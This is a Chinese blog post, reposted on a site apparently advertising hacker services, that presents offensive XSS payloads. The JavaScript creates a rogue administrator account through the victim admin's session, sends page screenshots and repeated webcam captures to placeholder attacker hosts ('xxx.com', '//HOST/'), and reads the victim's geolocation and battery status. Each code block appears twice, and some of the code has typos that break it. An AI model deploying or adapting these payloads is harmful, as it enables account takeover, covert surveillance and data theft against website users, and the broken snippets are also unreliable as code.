找黑客平台

XSS攻击另类玩法

访客4年前黑客工具504

本文原作者:SecJack


天就来讲一下大家都熟悉的 xss漏洞的攻击利用。相信大家对xss已经很熟悉了,但是很多安全人员的意识里 xss漏洞危害只有弹窗或者窃取cookie。但是xss还有更多的花式玩法,今天将介绍几种。


1.  xss攻击添加管理员




后台触发存储型XSS,网站设置http-only,窃取的cookie无效。那么如何在这种情况下利用xss漏洞。




无法获取cookie,但是我们可以利用xss漏洞,以管理员的权限,添加一个新的管理员。没错,就是让管理员给我们加一个高权限账号。




这里我们会用到 JavaScript和Ajax 技术。 利用xmlhttp 发送一个http请求,在后台发送一个添加管理员的post请求。






var request = false;


if(window.XMLHttpRequest) {


    request = new.XMLHttpRequest();


    if(request.overrideMimeType) {


        request.overrideMimeType('text/html');


    }


} else if(Window.ActiveXObject) {


    var versions = {'Microsoft.XMLHTTP','MSXML_XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP'};


    for(var i=0; i<versions.length; i ++){


        try{


            request = new ActiveXObject(versions);


        }catch(e){}


}


}


xmlhttp = request;




add_admin();


function add_admin(){


    var url = "/admin/admin_add_user.php";  //添加用户请求地址


    var params = "username=xss&passwod=123456&email=xss@xss.com&submit=1" //添加用户post数据


    xmlhttp.open("POST",url,true);


    xmlhttp.setRequstHeader("Content-type","application/x-www-form-urlencoded")


    xmlhttp.setRequstHeader("Content-length",params.length);


    xmlhttp.setRequstHeader("Connection","close")


    }


var request = false;


if(window.XMLHttpRequest) {


    request = new.XMLHttpRequest();


    if(request.overrideMimeType) {


        request.overrideMimeType('text/html');


    }


} else if(Window.ActiveXObject) {


    var versions = {'Microsoft.XMLHTTP','MSXML_XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP'};


    for(var i=0; i<versions.length; i ++){


        try{


            request = new ActiveXObject(versions);


        }catch(e){}


}


}


xmlhttp = request;


 


add_admin();


function add_admin(){


    var url = "/admin/admin_add_user.php";  //添加用户请求地址


    var params = "username=xss&passwod=123456&email=xss@xss.com&submit=1" //添加用户post数据


    xmlhttp.open("POST",url,true);


    xmlhttp.setRequstHeader("Content-type","application/x-www-form-urlencoded")


    xmlhttp.setRequstHeader("Content-length",params.length);


    xmlhttp.setRequstHeader("Connection","close")


    }


2, xss截取客户的屏幕




现在随着技术的进步,前端技术支持的面非常广泛。xss漏洞可以利用html5的 canvas 来进行屏幕的截屏功能,类似于远程控制木马查看对方屏幕功能。这个可以大大的提高对于进一步入侵的信息收集。废话不说直接上代码。




这里需要用到一个js库 html2canvas.js






document.write("<script src="html2canvas.js\><\/script>");   




window.onload=function(){


        html2canvas(document.body, {


        onrendered: function(canvas) {




//下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post


xhr=function(){


        var request = false;


        if(window.XMLHttpRequest){


                request = new XMLHttpRequest();


        }else if (window.ActiveXObject){


                try{


                        request = new window.ActiveXObject('Microsoft.XMLHTTP');


                }catch(e){




                }


        }




        return request;


}();




request = function(method,src,argv,content_type){


        xhr.open(method,src,false);


        if(method=='POST')xhr.setRequestHeader('Content-type',content_type);


        xhr.send(argv);                                         //发送POST数据


        return xhr.responseText;


};




attack_a = function(){


        var src         = "http://xxx.com/xss.php?";                 //post接收地址


        var argv_0      = "'&screenshot="+canvas.toDataURL();    //post字段名称为screenshot


        request("POST",src,argv_0,"application/x-www-form-urlencoded");


};




attack_a();




                                  }


                                });


                        }


document.write("<script src="html2canvas.js\><\/script>");   


 


window.onload=function(){


        html2canvas(document.body, {


        onrendered: function(canvas) {


 


//下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post


xhr=function(){


        var request = false;


        if(window.XMLHttpRequest){


                request = new XMLHttpRequest();


        }else if (window.ActiveXObject){


                try{


                        request = new window.ActiveXObject('Microsoft.XMLHTTP');


                }catch(e){


 


                }


        }


 


        return request;


}();


 


request = function(method,src,argv,content_type){


        xhr.open(method,src,false);


        if(method=='POST')xhr.setRequestHeader('Content-type',content_type);


        xhr.send(argv);                                         //发送POST数据


        return xhr.responseText;


};


 


attack_a = function(){


        var src         = "http://xxx.com/xss.php?";                 //post接收地址


        var argv_0      = "'&screenshot="+canvas.toDataURL();    //post字段名称为screenshot


        request("POST",src,argv_0,"application/x-www-form-urlencoded");


};


 


attack_a();


 


                                  }


                                });


                        }


上面的代码是针对 pc端的截屏,手机端的截屏xss代码有所不同






<script>


d=document;


v=d.createElement('video');


c=d.createElement('canvas');


c.width=640;


c.height=480;


navigator.webkitGetUserMedia({'video':true},function(s){


v.src=URL.createObjectURL(s);v.play()},function(){});


c2=c.getContext('2d');


x='c2.drawImage(v,0,0,640,480);fetch("//HOST/"+c2.canvas.toDataURL())';


setInterval(x,5000);


</script>


<script>


d=document;


v=d.createElement('video');


c=d.createElement('canvas');


c.width=640;


c.height=480;


navigator.webkitGetUserMedia({'video':true},function(s){


v.src=URL.createObjectURL(s);v.play()},function(){});


c2=c.getContext('2d');


x='c2.drawImage(v,0,0,640,480);fetch("//HOST/"+c2.canvas.toDataURL())';


setInterval(x,5000);


</script>


这两种服务端获取到的post数据包是 base64格式的 ,我们只要进行转码即可看到对方的屏幕截图。




3.xss对移动端的攻击




现在越来越多的人喜欢用手机查看网页,xss针对手机端的支持也很友好。




这里只针对手机端Firefox浏览器说明。




xss获取对方经纬度代码






<script>




navigator.geolocation.getCurrentPosition(function(p){




alert('Latitude:'+p.coords.latitude+',Longitude:'+


p.coords.longitude+',Altitude:'+p.coords.altitude);})




</script>




<script>


 


navigator.geolocation.getCurrentPosition(function(p){


 


alert('Latitude:'+p.coords.latitude+',Longitude:'+


p.coords.longitude+',Altitude:'+p.coords.altitude);})


 


</script>


xss获取电池状态的代码,这里需要用到JavaScript Battery API






<svg onload=alert(navigator.battery.level)>




<svg onload=alert(navigator.battery.dischargingTime)>




<svg onload=alert(navigator.battery.charging)>




<svg onload=alert(navigator.battery.level)>


 


<svg onload=alert(navigator.battery.dischargingTime)>


 


<svg onload=alert(navigator.battery.charging)>


更多xss猥琐玩法欢迎交流,文章若有错误请留言告知~


标签: XSS玩法
返回列表

上一篇:免费版手机号码追踪定位(下载对方手机号跟踪定位)

下一篇:全家便利店加盟费用是多少,全家便利店加盟需

相关文章

动物森友会五月有什么活动 动物之森五月活动玩法攻略

动物森友会五月有什么活动 动物之森五月活动玩法攻略

集合啦动物森友会五月有什么活动?集合啦动物森友会在最近的版本更新后上线了新的活动玩法,本次游戏的五月活动已经全部公布,五月份的活动不少,一共有地球日、劳动节和博物馆日三个活动可以游玩,这些活动都有些什...

剑与远征女妖队玩法攻略 耀光女妖国家队详细解析

剑与远征女妖队玩法攻略 耀光女妖国家队详细解析

剑与远征女妖队怎么玩?耀光女妖国家队怎么搭配?女妖队是中期非常强势的推图套路,也是当前非常适合平民玩家的玩法。下面带来剑与远征耀光女妖国家队详细解析,感兴趣的小伙伴们一起看看吧。 【耀光女妖国家...

原神新手玩法指南 原神手机版前期注意要点

原神新手池值得抽吗?原神马上就要开启全平台的公测了,这次游戏已经有很多的pc版玩家先行玩到了游戏,因此对新手期的内容有了很深的认识。相信手机版的萌新都不是很清楚,进入游戏后都有哪些细节需要注意。这里就...

云顶之弈10.10虚空斗刺法攻略玩法 云顶之弈10.10强势吃鸡阵容推荐

云顶之弈10.10虚空斗刺法攻略玩法 云顶之弈10.10强势吃鸡阵容推荐

云顶之弈10.10虚空斗刺法怎么玩?云顶之弈10.10版本里,有很多阵容可以尝试,在这次的新版本里,虚空斗刺法强势崛起,虚空斗X系列w大家一定很熟悉了,但是这次的强度和玩法都比较新颖,很适合作为一支奇...

剑与远征回音峡谷怎么走 回音峡谷地图玩法攻略

剑与远征回音峡谷怎么走 回音峡谷地图玩法攻略

剑与远征回音峡谷怎么打?剑与远征在6月27日新开启了新的地图回音峡谷,这次的地图作为新的地图,难度还是很高的,而路线也是很家关新的内容。这次的地图具体是要怎么走?BOSS的打法又是什么呢?下面我们就一...

炉石传说套牌集结令怎么玩 乱斗套牌集结令玩法攻略

炉石传说套牌集结令怎么玩 乱斗套牌集结令玩法攻略

炉石传说套牌集结令乱斗怎么玩?炉石传说每周的乱斗模式按时开启, 7月5日的乱斗模式玩法为套牌集结令,这也是一个大家很熟悉的老乱斗了。这次的玩法其实很像是竞技场,因此如果运气不好的话就要打很长时间才能拿...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.